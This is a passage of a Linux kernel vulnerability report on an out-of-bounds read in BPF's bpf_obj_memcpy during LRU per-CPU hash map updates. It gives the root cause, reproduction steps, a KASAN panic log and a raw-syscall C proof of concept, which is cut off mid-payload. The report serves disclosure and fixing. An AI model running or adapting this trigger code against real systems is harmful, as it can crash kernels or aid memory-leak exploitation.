bpf: slab-out-of-bounds read in bpf_obj_memcpy

[梅开彦]

Our fuzzer discovered a slab-out-of-bounds read vulnerability in the BPF subsystem when updating a `BPF_MAP_TYPE_LRU_PERCPU_HASH` map. The flaw occurs because the `bpf_long_memcpy` function, which is used to copy data into the per-CPU map value, incorrectly calculates the size of the memory to be read. It rounds up the size to the nearest 8 bytes, even when the actual source buffer is smaller, leading to an out-of-bounds read.

Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>

## Root Cause

This can be triggered by a specially crafted BPF program that performs the following sequence of operations:

1. A BPF program prepares a data buffer of a size that is not a multiple of 8 (e.g., 4 bytes). This can be done by getting a pointer to a value from another map, for instance a `BPF_MAP_TYPE_CGROUP_STORAGE` map (`map1`) with `value_size = 4`.
2. This pointer (to the 4-byte buffer) is passed as the `value` argument to `bpf_map_update_elem` for a `BPF_MAP_TYPE_LRU_PERCPU_HASH` map (`map2`), which also has `value_size = 4`.
3. The map update operation triggers the call chain: `__htab_lru_percpu_map_update_elem` -> `pcpu_init_value` -> `copy_map_value_long` -> `bpf_obj_memcpy`.
4. `copy_map_value_long` invokes `bpf_obj_memcpy` with `long_memcpy` set to `true` and a `size` of 4 (from `map2->value_size`).
5. Inside `bpf_obj_memcpy`, because `long_memcpy` is true, it calls `bpf_long_memcpy` with a size rounded up to 8 bytes: `bpf_long_memcpy(dst, src, round_up(4, 8))`.
6. `bpf_long_memcpy` then attempts to read 8 bytes from the source pointer, but the source buffer is only 4 bytes long. This results in an out-of-bounds read of 4 bytes, triggering a KASAN error. The pointer arithmetic in the original PoC is not necessary to trigger the vulnerability.

### Execution Flow Visualization

```c
Vulnerability Execution Flow
|
|--- 1. BPF program obtains a pointer to a 4-byte buffer
| |
| `-- bpf_get_local_storage(map1) -> src_ptr (points to 4-byte cgroup storage value)
|
|--- 2. BPF program updates a different map with this pointer
| |
| `-- bpf_map_update_elem(map2, key, src_ptr, flags)
| |
| `-> map2 is of type BPF_MAP_TYPE_LRU_PERCPU_HASH with value_size = 4
|
|--- 3. Kernel space: Map update process
|
`-- __htab_lru_percpu_map_update_elem()
|
`-- pcpu_init_value()
|
`-- copy_map_value_long()
|
`-- bpf_obj_memcpy(..., src_ptr, size=4, long_memcpy=true)
|
|--> rounded_size = round_up(4, 8) // rounded_size is 8
|
`-- bpf_long_memcpy(..., src_ptr, rounded_size=8)
|
`-> Attempts to read 8 bytes from src_ptr, which is only 4 bytes long.
|
`-> CRASH: Out-of-bounds read occurs here.
```

## Reproduction Steps

1. **Map Creation**: Create two BPF maps:
* `map1`: A map from which a source buffer can be obtained, e.g., `BPF_MAP_TYPE_CGROUP_STORAGE`, with `value_size = 4`.
* `map2`: A `BPF_MAP_TYPE_LRU_PERCPU_HASH` map with `value_size = 4`.
2. **Program Setup**: Load a BPF program that performs the following logic:
a. Calls `bpf_get_local_storage` on `map1` to get a pointer to the 4-byte value.
b. Calls `bpf_map_update_elem` on `map2`, passing the pointer from step (a) as the `value`.
3. **Trigger**: Run the BPF program using the `BPF_PROG_TEST_RUN` command. The out-of-bounds read will occur during the `bpf_map_update_elem` helper call within the program's execution.

## KASAN Report

```
[ 329.363954][ T9950] ==================================================================
[ 329.364725][ T9950] BUG: KASAN: slab-out-of-bounds in bpf_obj_memcpy+0x257/0x2b0
[ 329.365445][ T9950] Read of size 8 at addr ff11000044c22c90 by task poc/9950
[ 329.366119][ T9950]
[ 329.366354][ T9950] CPU: 1 UID: 0 PID: 9950 Comm: poc Not tainted 6.19.0-rc5-gae23bc81ddf7 #2 PREEMPT(full)
[ 329.366378][ T9950] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 329.366385][ T9950] Call Trace:
[ 329.366390][ T9950] <TASK>
[ 329.366396][ T9950] dump_stack_lvl+0x116/0x1b0
[ 329.366419][ T9950] print_report+0xca/0x5f0
[ 329.366440][ T9950] ? __phys_addr+0xf0/0x180
[ 329.366453][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.366466][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.366479][ T9950] kasan_report+0xca/0x100
[ 329.366495][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.366511][ T9950] bpf_obj_memcpy+0x257/0x2b0
[ 329.366524][ T9950] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 329.366540][ T9950] ? bpf_lru_pop_free+0x26f/0x1720
[ 329.366555][ T9950] pcpu_init_value.part.0+0x3da/0x4c0
[ 329.366573][ T9950] __htab_lru_percpu_map_update_elem+0x6e2/0xa40
[ 329.366592][ T9950] ? __pfx___htab_lru_percpu_map_update_elem+0x10/0x10
[ 329.366610][ T9950] ? kvm_clock_get_cycles+0x3f/0x70
[ 329.366624][ T9950] ? ktime_get+0x1cc/0x300
[ 329.366643][ T9950] bpf_prog_8fdc57b6fcadb4dd+0x4e/0x5a
[ 329.366654][ T9950] bpf_test_run+0x44a/0xd50
[ 329.366674][ T9950] ? __pfx_bpf_test_run+0x10/0x10
[ 329.366690][ T9950] ? lockdep_hardirqs_on+0x7c/0x110
[ 329.366705][ T9950] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 329.366721][ T9950] ? __pfx___debug_object_init+0x10/0x10
[ 329.366739][ T9950] ? rcu_is_watching+0x12/0xc0
[ 329.366752][ T9950] ? __phys_addr+0xf0/0x180
[ 329.366765][ T9950] ? kasan_save_track+0x14/0x30
[ 329.366778][ T9950] ? __kasan_krealloc+0xf6/0x170
[ 329.366794][ T9950] ? krealloc_node_align_noprof+0x276/0x3e0
[ 329.366811][ T9950] ? eth_type_trans+0x2ea/0x760
[ 329.366830][ T9950] bpf_prog_test_run_skb+0xfe3/0x3190
[ 329.366847][ T9950] ? __lock_acquire+0x490/0x2610
[ 329.366869][ T9950] ? __pfx_bpf_prog_test_run_skb+0x10/0x10
[ 329.366887][ T9950] ? __might_fault+0xe5/0x190
[ 329.366901][ T9950] ? fdget+0x17f/0x220
[ 329.366913][ T9950] ? __pfx_bpf_prog_test_run_skb+0x10/0x10
[ 329.366931][ T9950] __sys_bpf+0x15cd/0x5610
[ 329.366944][ T9950] ? __pfx___sys_bpf+0x10/0x10
[ 329.366956][ T9950] ? __lock_acquire+0x490/0x2610
[ 329.366971][ T9950] ? css_rstat_updated+0x1c5/0x570
[ 329.366989][ T9950] ? __pfx_css_rstat_updated+0x10/0x10
[ 329.367017][ T9950] __x64_sys_bpf+0x7d/0xc0
[ 329.367028][ T9950] ? lockdep_hardirqs_on+0x7c/0x110
[ 329.367044][ T9950] do_syscall_64+0xcb/0xf80
[ 329.367060][ T9950] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 329.367073][ T9950] RIP: 0033:0x7f9a587a97d9
[ 329.367083][ T9950] Code: 08 89 e8 5b 5d c3 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f8
[ 329.367095][ T9950] RSP: 002b:00007ffef1808c58 EFLAGS: 00000287 ORIG_RAX: 0000000000000141
[ 329.367108][ T9950] RAX: ffffffffffffffda RBX: 00007ffef1808d88 RCX: 00007f9a587a97d9
[ 329.367116][ T9950] RDX: 0000000000000050 RSI: 0000200000003a00 RDI: 000000000000000a
[ 329.367123][ T9950] RBP: 00007ffef1808c70 R08: 0000000000000000 R09: 0000000000000000
[ 329.367130][ T9950] R10: 0000000000000000 R11: 0000000000000287 R12: 0000000000000000
[ 329.367138][ T9950] R13: 00007ffef1808d98 R14: 000055edb3b92dd8 R15: 00007f9a588c9020
[ 329.367151][ T9950] </TASK>
[ 329.367156][ T9950]
[ 329.396696][ T9950] Allocated by task 9950:
[ 329.397121][ T9950] kasan_save_stack+0x24/0x50
[ 329.397585][ T9950] kasan_save_track+0x14/0x30
[ 329.398034][ T9950] __kasan_kmalloc+0xaa/0xb0
[ 329.398479][ T9950] __kmalloc_node_noprof+0x357/0x970
[ 329.398978][ T9950] bpf_map_kmalloc_node+0x9b/0xf0
[ 329.399455][ T9950] bpf_cgroup_storage_alloc+0x229/0x450
[ 329.399990][ T9950] bpf_test_run+0x130/0xd50
[ 329.400421][ T9950] bpf_prog_test_run_skb+0xfe3/0x3190
[ 329.400931][ T9950] __sys_bpf+0x15cd/0x5610
[ 329.401351][ T9950] __x64_sys_bpf+0x7d/0xc0
[ 329.401770][ T9950] do_syscall_64+0xcb/0xf80
[ 329.402202][ T9950] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 329.402786][ T9950]
[ 329.403013][ T9950] The buggy address belongs to the object at ff11000044c22c80
[ 329.403013][ T9950] which belongs to the cache kmalloc-cg-32 of size 32
[ 329.404294][ T9950] The buggy address is located 16 bytes inside of
[ 329.404294][ T9950] allocated 20-byte region [ff11000044c22c80, ff11000044c22c94)
[ 329.405554][ T9950]
[ 329.405781][ T9950] The buggy address belongs to the physical page:
[ 329.406379][ T9950] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x44c22
[ 329.407208][ T9950] memcg:ff1100004d957001
[ 329.407632][ T9950] flags: 0x4fff00000000000(node=1|zone=1|lastcpupid=0x7ff)
[ 329.408340][ T9950] page_type: f5(slab)
[ 329.408733][ T9950] raw: 04fff00000000000 ff1100001c43bb40 ffd400000117ba80 dead000000000002
[ 329.409551][ T9950] raw: 0000000000000000 0000000080400040 00000000f5000000 ff1100004d957001
[ 329.410373][ T9950] page dumped because: kasan: bad access detected
[ 329.410986][ T9950] page_owner tracks the page as allocated
[ 329.411514][ T9950] page last allocated via order 0, migratetype Unmovable, gfp_mask 0x52cc0(GFP_KERNEL|__GFP_NOWARN|__GFP_NORETRY|__GFP_COMP), pid 27, tgid 27 (kworker/u10:0), ts 115031235007
[ 329.413243][ T9950] post_alloc_hook+0x1ca/0x240
[ 329.413695][ T9950] get_page_from_freelist+0xdb8/0x2a70
[ 329.414208][ T9950] __alloc_frozen_pages_noprof+0x25b/0x20f0
[ 329.414774][ T9950] alloc_pages_mpol+0x1f6/0x550
[ 329.415242][ T9950] new_slab+0x2d5/0x440
[ 329.415639][ T9950] ___slab_alloc+0xddd/0x1bc0
[ 329.416083][ T9950] __slab_alloc.constprop.0+0x6b/0x120
[ 329.416595][ T9950] __kmalloc_noprof+0x5a7/0x960
[ 329.417054][ T9950] lsm_cred_alloc+0x7d/0xa0
[ 329.417486][ T9950] security_prepare_creds+0x2a/0x270
[ 329.417983][ T9950] prepare_creds+0x5df/0x940
[ 329.418445][ T9950] copy_creds+0xb0/0xa60
[ 329.418846][ T9950] copy_process+0x12e1/0x7460
[ 329.419291][ T9950] kernel_clone+0xef/0x890
[ 329.419715][ T9950] user_mode_thread+0xcd/0x110
[ 329.420166][ T9950] call_usermodehelper_exec_work+0xd5/0x190
[ 329.420727][ T9950] page last free pid 1 tgid 1 stack trace:
[ 329.421265][ T9950] __free_frozen_pages+0x843/0x1140
[ 329.421753][ T9950] vfree+0x238/0xb50
[ 329.422132][ T9950] bdev_disk_changed+0x668/0x1540
[ 329.422622][ T9950] blkdev_get_whole+0x18f/0x2a0
[ 329.423088][ T9950] bdev_open+0x2cc/0xe40
[ 329.423488][ T9950] bdev_file_open_by_dev+0x180/0x220
[ 329.423987][ T9950] disk_scan_partitions+0x1f4/0x330
[ 329.424480][ T9950] add_disk_fwnode+0x425/0x5f0
[ 329.424934][ T9950] brd_alloc.isra.0+0x566/0x7f0
[ 329.425394][ T9950] brd_init+0xfa/0x1e0
[ 329.425793][ T9950] do_one_initcall+0x111/0x660
[ 329.426252][ T9950] kernel_init_freeable+0x5b4/0x8c0
[ 329.426746][ T9950] kernel_init+0x23/0x2d0
[ 329.427157][ T9950] ret_from_fork+0x96b/0xaf0
[ 329.427596][ T9950] ret_from_fork_asm+0x1a/0x30
[ 329.428054][ T9950]
[ 329.428279][ T9950] Memory state around the buggy address:
[ 329.428803][ T9950] ff11000044c22b80: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc
[ 329.429543][ T9950] ff11000044c22c00: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc
[ 329.430278][ T9950] >ff11000044c22c80: 00 00 04 fc fc fc fc fc 00 00 03 fc fc fc fc fc
[ 329.431018][ T9950] ^
[ 329.431455][ T9950] ff11000044c22d00: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc
[ 329.432190][ T9950] ff11000044c22d80: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc
[ 329.432926][ T9950] ==================================================================
[ 329.433662][ T9950] Kernel panic - not syncing: KASAN: panic_on_warn set ...
[ 329.434330][ T9950] CPU: 1 UID: 0 PID: 9950 Comm: poc Not tainted 6.19.0-rc5-gae23bc81ddf7 #2 PREEMPT(full)
[ 329.435255][ T9950] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 329.436097][ T9950] Call Trace:
[ 329.436410][ T9950] <TASK>
[ 329.436693][ T9950] dump_stack_lvl+0x3d/0x1b0
[ 329.437136][ T9950] vpanic+0x67e/0x710
[ 329.437520][ T9950] panic+0xc7/0xd0
[ 329.437883][ T9950] ? __pfx_panic+0x10/0x10
[ 329.438309][ T9950] ? end_report+0x4c/0x160
[ 329.439009][ T9950] ? rcu_is_watching+0x12/0xc0
[ 329.439482][ T9950] ? lock_release+0x1fc/0x2d0
[ 329.439935][ T9950] ? check_panic_on_warn+0x24/0xc0
[ 329.440422][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.440883][ T9950] check_panic_on_warn+0xb6/0xc0
[ 329.441355][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.441817][ T9950] end_report+0x107/0x160
[ 329.442239][ T9950] kasan_report+0xd8/0x100
[ 329.442677][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.443144][ T9950] bpf_obj_memcpy+0x257/0x2b0
[ 329.443589][ T9950] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 329.444142][ T9950] ? bpf_lru_pop_free+0x26f/0x1720
[ 329.444628][ T9950] pcpu_init_value.part.0+0x3da/0x4c0
[ 329.445142][ T9950] __htab_lru_percpu_map_update_elem+0x6e2/0xa40
[ 329.445742][ T9950] ? __pfx___htab_lru_percpu_map_update_elem+0x10/0x10
[ 329.446391][ T9950] ? kvm_clock_get_cycles+0x3f/0x70
[ 329.446883][ T9950] ? ktime_get+0x1cc/0x300
[ 329.447316][ T9950] bpf_prog_8fdc57b6fcadb4dd+0x4e/0x5a
[ 329.447833][ T9950] bpf_test_run+0x44a/0xd50
[ 329.448271][ T9950] ? __pfx_bpf_test_run+0x10/0x10
[ 329.448750][ T9950] ? lockdep_hardirqs_on+0x7c/0x110
[ 329.449245][ T9950] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 329.449798][ T9950] ? __pfx___debug_object_init+0x10/0x10
[ 329.450330][ T9950] ? rcu_is_watching+0x12/0xc0
[ 329.450800][ T9950] ? __phys_addr+0xf0/0x180
[ 329.451239][ T9950] ? kasan_save_track+0x14/0x30
[ 329.451704][ T9950] ? __kasan_krealloc+0xf6/0x170
[ 329.452180][ T9950] ? krealloc_node_align_noprof+0x276/0x3e0
[ 329.452739][ T9950] ? eth_type_trans+0x2ea/0x760
[ 329.453206][ T9950] bpf_prog_test_run_skb+0xfe3/0x3190
[ 329.453752][ T9950] ? __lock_acquire+0x490/0x2610
[ 329.454229][ T9950] ? __pfx_bpf_prog_test_run_skb+0x10/0x10
[ 329.454789][ T9950] ? __might_fault+0xe5/0x190
[ 329.455235][ T9950] ? fdget+0x17f/0x220
[ 329.455621][ T9950] ? __pfx_bpf_prog_test_run_skb+0x10/0x10
[ 329.456173][ T9950] __sys_bpf+0x15cd/0x5610
[ 329.456595][ T9950] ? __pfx___sys_bpf+0x10/0x10
[ 329.457045][ T9950] ? __lock_acquire+0x490/0x2610
[ 329.457515][ T9950] ? css_rstat_updated+0x1c5/0x570
[ 329.458002][ T9950] ? __pfx_css_rstat_updated+0x10/0x10
[ 329.458542][ T9950] __x64_sys_bpf+0x7d/0xc0
[ 329.458962][ T9950] ? lockdep_hardirqs_on+0x7c/0x110
[ 329.459455][ T9950] do_syscall_64+0xcb/0xf80
[ 329.459888][ T9950] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 329.460441][ T9950] RIP: 0033:0x7f9a587a97d9
[ 329.460861][ T9950] Code: 08 89 e8 5b 5d c3 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f8
[ 329.462633][ T9950] RSP: 002b:00007ffef1808c58 EFLAGS: 00000287 ORIG_RAX: 0000000000000141
[ 329.463406][ T9950] RAX: ffffffffffffffda RBX: 00007ffef1808d88 RCX: 00007f9a587a97d9
[ 329.464138][ T9950] RDX: 0000000000000050 RSI: 0000200000003a00 RDI: 000000000000000a
[ 329.464866][ T9950] RBP: 00007ffef1808c70 R08: 0000000000000000 R09: 0000000000000000
[ 329.465601][ T9950] R10: 0000000000000000 R11: 0000000000000287 R12: 0000000000000000
[ 329.466326][ T9950] R13: 00007ffef1808d98 R14: 000055edb3b92dd8 R15: 00007f9a588c9020
[ 329.467073][ T9950] </TASK>
[ 329.467512][ T9950] Kernel Offset: disabled
```

## Proof of Concept

The following C program can demonstrate the vulnerability on bpf-next(ae23bc81ddf7c17b663c4ed1b21e35527b0a7131).

```c
#define _GNU_SOURCE

#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef __NR_bpf
#define __NR_bpf 321
#endif

#define BITMASK(bf_off,bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type,htobe,addr,val,bf_off,bf_len) *(type*)(addr) = htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))

uint64_t r[3] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff};

int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {}
*(uint32_t*)0x200000000840 = 0x13;
*(uint32_t*)0x200000000844 = 8;
*(uint32_t*)0x200000000848 = 0x4;
*(uint32_t*)0x20000000084c = 0;
*(uint32_t*)0x200000000850 = 0;
*(uint32_t*)0x200000000854 = 0;
*(uint32_t*)0x200000000858 = 0;
memset((void*)0x20000000085c, 0, 16);
*(uint32_t*)0x20000000086c = 0;
*(uint32_t*)0x200000000870 = 0;
*(uint32_t*)0x200000000874 = 0;
*(uint32_t*)0x200000000878 = 0;
*(uint32_t*)0x20000000087c = 0;
*(uint64_t*)0x200000000880 = 0;
*(uint32_t*)0x200000000888 = 0;
*(uint32_t*)0x20000000088c = 0;
res = syscall(__NR_bpf, /*cmd=*/0ul, /*arg=*/0x200000000840ul, /*size=*/0x50ul);
if (res != -1)
r[0] = res;
*(uint32_t*)0x200000000c80 = 0xa;
*(uint32_t*)0x200000000c84 = 4;
*(uint32_t*)0x200000000c88 = 4;
*(uint32_t*)0x200000000c8c = 0x4c;
*(uint32_t*)0x200000000c90 = 0;
*(uint32_t*)0x200000000c94 = 0;
*(uint32_t*)0x200000000c98 = 0;
memset((void*)0x200000000c9c, 0, 16);
*(uint32_t*)0x200000000cac = 0;
*(uint32_t*)0x200000000cb0 = 0;
*(uint32_t*)0x200000000cb4 = 0;
*(uint32_t*)0x200000000cb8 = 0;
*(uint32_t*)0x200000000cbc = 0;
*(uint64_t*)0x200000000cc0 = 0;
*(uint32_t*)0x200000000cc8 = 0;
*(uint32_t*)0x200000000ccc = 0;
res = syscall(__NR_bpf, /*cmd=*/0ul, /*arg=*/0x200000000c80ul, /*size=*/0x50ul);
if (res != -1)
r[1] = res;
*(uint32_t*)0x200000002700 = 8;
*(uint32_t*)0x200000002704 = 0x10;
*(uint64_t*)0x200000002708 = 0x2000000027c0;
*(uint8_t*)0x2000000027c0 = 0xb7;
STORE_BY_BITMASK(uint8_t, , 0x2000000027c1, 6, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027c1, 0, 4, 4);
*(uint16_t*)0x2000000027c2 = 0;
*(uint32_t*)0x2000000027c4 = 0;
*(uint8_t*)0x2000000027c8 = 0x18;
STORE_BY_BITMASK(uint8_t, , 0x2000000027c9, 1, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027c9, 1, 4, 4);
*(uint16_t*)0x2000000027ca = 0;
*(uint32_t*)0x2000000027cc = r[0];
*(uint8_t*)0x2000000027d0 = 0;
*(uint8_t*)0x2000000027d1 = 0;
*(uint16_t*)0x2000000027d2 = 0;
*(uint32_t*)0x2000000027d4 = 0;
*(uint8_t*)0x2000000027d8 = 0xb7;
STORE_BY_BITMASK(uint8_t, , 0x2000000027d9, 2, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027d9, 0, 4, 4);
*(uint16_t*)0x2000000027da = 0;
*(uint32_t*)0x2000000027dc = 0;
*(uint8_t*)0x2000000027e0 = 0x85;
STORE_BY_BITMASK(uint8_t, , 0x2000000027e1, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027e1, 0, 4, 4);
*(uint16_t*)0x2000000027e2 = 0;
*(uint32_t*)0x2000000027e4 = 0x51;
*(uint8_t*)0x2000000027e8 = 0x7b;
STORE_BY_BITMASK(uint8_t, , 0x2000000027e9, 0xa, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027e9, 6, 4, 4);
*(uint16_t*)0x2000000027ea = 0xfff8;
*(uint32_t*)0x2000000027ec = 0;
*(uint8_t*)0x2000000027f0 = 0xbf;
STORE_BY_BITMASK(uint8_t, , 0x2000000027f1, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027f1, 0, 4, 4);
*(uint16_t*)0x2000000027f2 = 0;
*(uint32_t*)0x2000000027f4 = 0;
*(uint8_t*)0x2000000027f8 = 0xbf;
STORE_BY_BITMASK(uint8_t, , 0x2000000027f9, 2, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027f9, 0xa, 4, 4);
*(uint16_t*)0x2000000027fa = 0;
*(uint32_t*)0x2000000027fc = 0;
*(uint8_t*)0x200000002800 = 7;
STORE_BY_BITMASK(uint8_t, , 0x200000002801, 2, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002801, 0, 4, 4);
*(uint16_t*)0x200000002802 = 0;
*(uint32_t*)0x200000002804 = 0xfffffff8;
*(uint8_t*)0x200000002808 = 0x18;
STORE_BY_BITMASK(uint8_t, , 0x200000002809, 1, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002809, 1, 4, 4);
*(uint16_t*)0x20000000280a = 0;
*(uint32_t*)0x20000000280c = r[1];
*(uint8_t*)0x200000002810 = 0;
*(uint8_t*)0x200000002811 = 0;
*(uint16_t*)0x200000002812 = 0;
*(uint32_t*)0x200000002814 = 0;
*(uint8_t*)0x200000002818 = 0xbf;
STORE_BY_BITMASK(uint8_t, , 0x200000002819, 3, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002819, 0, 4, 4);
*(uint16_t*)0x20000000281a = 0;
*(uint32_t*)0x20000000281c = 0;
*(uint8_t*)0x200000002820 = 0xb7;
STORE_BY_BITMASK(uint8_t, , 0x200000002821, 4, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002821, 0, 4, 4);
*(uint16_t*)0x200000002822 = 0;
*(uint32_t*)0x200000002824 = 0;
*(uint8_t*)0x200000002828 = 0x85;
STORE_BY_BITMASK(uint8_t, , 0x200000002829, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002829, 0, 4, 4);
*(uint16_t*)0x20000000282a = 0;
*(uint32_t*)0x20000000282c = 2;
*(uint8_t*)0x200000002830 = 0xb7;
STORE_BY_BITMASK(uint8_t, , 0x200000002831, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002831, 0, 4, 4);
*(uint16_t*)0x200000002832 = 0;
*(uint32_t*)0x200000002834 = 1;
*(uint8_t*)0x200000002838 = 0x95;
STORE_BY_BITMASK(uint8_t, , 0x200000002839, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002839, 0, 4, 4);
*(uint16_t*)0x20000000283a = 0;
*(uint32_t*)0x20000000283c = 0;
*(uint64_t*)0x200000002710 = 0x200000002840;
memcpy((void*)0x200000002840, "GPL\000", 4);
*(uint32_t*)0x200000002718 = 0;
*(uint32_t*)0x20000000271c = 0;
*(uint64_t*)0x200000002720 = 0;
*(uint32_t*)0x200000002728 = 0;
*(uint32_t*)0x20000000272c = 0;
memset((void*)0x200000002730, 0, 16);
*(uint32_t*)0x200000002740 = 0;
*(uint32_t*)0x200000002744 = 1;
*(uint32_t*)0x200000002748 = 0;
*(uint32_t*)0x20000000274c = 0;
*(uint64_t*)0x200000002750 = 0;
*(uint32_t*)0x200000002758 = 0;
*(uint32_t*)0x20000000275c = 0;
*(uint64_t*)0x200000002760 = 0;
*(uint32_t*)0x200000002768 = 0;
*(uint32_t*)0x20000000276c = 0;
*(uint32_t*)0x200000002770 = 0;
*(uint32_t*)0x200000002774 = 0;
*(uint64_t*)0x200000002778 = 0;
*(uint64_t*)0x200000002780 = 0;
*(uint32_t*)0x200000002788 = 0;
*(uint32_t*)0x20000000278c = 0;
*(uint32_t*)0x200000002790 = 0;
res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x200000002700ul, /*size=*/0x94ul);
if (res != -1)
r[2] = res;
*(uint32_t*)0x200000003a00 = r[2];
*(uint32_t*)0x200000003a04 = 0;
*(uint32_t*)0x200000003a08 = 0x768;
*(uint32_t*)0x200000003a0c = 0;
*(uint64_t*)0x200000003a10 = 0x200000002980;
memcpy((void*)0x200000002980, "\xe2\x88\x3d\xee\x0d\x53\x2a\x4f\x03\x02\x73\x22\x86\xdd\x60\x3a\x46\x43\x07\x32\x4c\x1a\x99\xbc\xfb\xa2\xf4\x21\xa7\x32\x0c\xe9\x9f\x2c\x7c\x23\xdd\x49\x02\xea\xaf\x29\x3b\x6f\xdf\x4c\x34\xf8\x81\x02\x58\xb2\x89\x1c\x02\x8e\xf4\x18\x79\xa3\x0a\x0c\xb5\x9f\x9f\x11\x8a\x1d\xe8\x9a\x4f\x4b\x13\xeb\x2b\xd8\xfe\xa8\x17\x3a\x38\x4f\xe3\xf2\xfe\xc4\x6f\xef\x79\x6e\x1c\x42\x39\x68\x83\xc6\xf9\xbc\x2a\x29\x48\xf0\x07\x6d\x00\xa5\xf2\xae\xe4\x59\xc9\x5d\xb5\x62\x90\x08\xbc\x38\xbb\x60\x68\x44\x3a\x72\xb7\x14\xaa\xb8\x93\x69\xda\x01\x2f\xf4\xcc\x0e\x58\xd1\xf1\x0a\xf1\x45\xd9\x8a\x39\x03\xe5\x1e\x67\x20\xce\x33\x17\x41\x87\xae\x06\xd4\x38\x76\xa2\xc6\xa1\xcb\xc9\x22\x27\x11\xb6\x4c\x2d\xc8\xcb\x27\xd7\x46\x6a\xa5\x6d\x15\x2a\x29\xda\x60\x80\xf9\x3d\xbb\x0b\x39\x95\xc7\x0c\x1c\x30\xd0\xa6\x66\xac\xd2\xe8\x8a\xc9\x03\x01\xf2\x04\xdc\xd9\xad\x54\x76\x1c\xa2\x95\x55\x79\xa4\x1b\xd1\xe1\x8f\x80\x1a\xbb\x63\x86\x74\x12\x98\xec\x9a\x0f\xe2\x7b\xe7\x10\xdd\xa2\x46\x3c\x15\x4c\x74\x9a\x18\x2d\x8a\x21\x60\x4e\x47\x14\x3a\xbb\x57\x40\x72\x0b\x60\x66\x9d\xb2\x69\x5a\x72\x16\xcb\x8f\x4e\x2a\x05\x1e\xb0\x26\x9c\x28\xb0\xf1\x83\x52\xdd\x61\xba\xd2\xee\x3a\x42\x2f\xc6\xb2\x3f\xe6\x3b\x6f\x1f\x30\x27\xbb\xf8\x14\xd6\xab\x11\x23\x8d\xdb\xf7\xa9\xa7\x7a\xb8\x6e\xf0\xc3\x52\xb9\xba\x12\x14\x8b\xab\x01\x79\xd0\x8f\x99\x57\x83\xf7\x81\xcb\x16\xff\x98\x14\x9c\xbc\xdd\x84\x9b\x61\x80\x45\x69\xdf\x6f\x1c\x2a\x21\xf3\xfb\xe9\xc8\xc5\xb5\x9a\x23\x48\x91\x5d\x3d\x9b\x9d\xc5\x85\x77\x5d\x1a\xdc\xc9\xc2\x05\x14\xb0\x4e\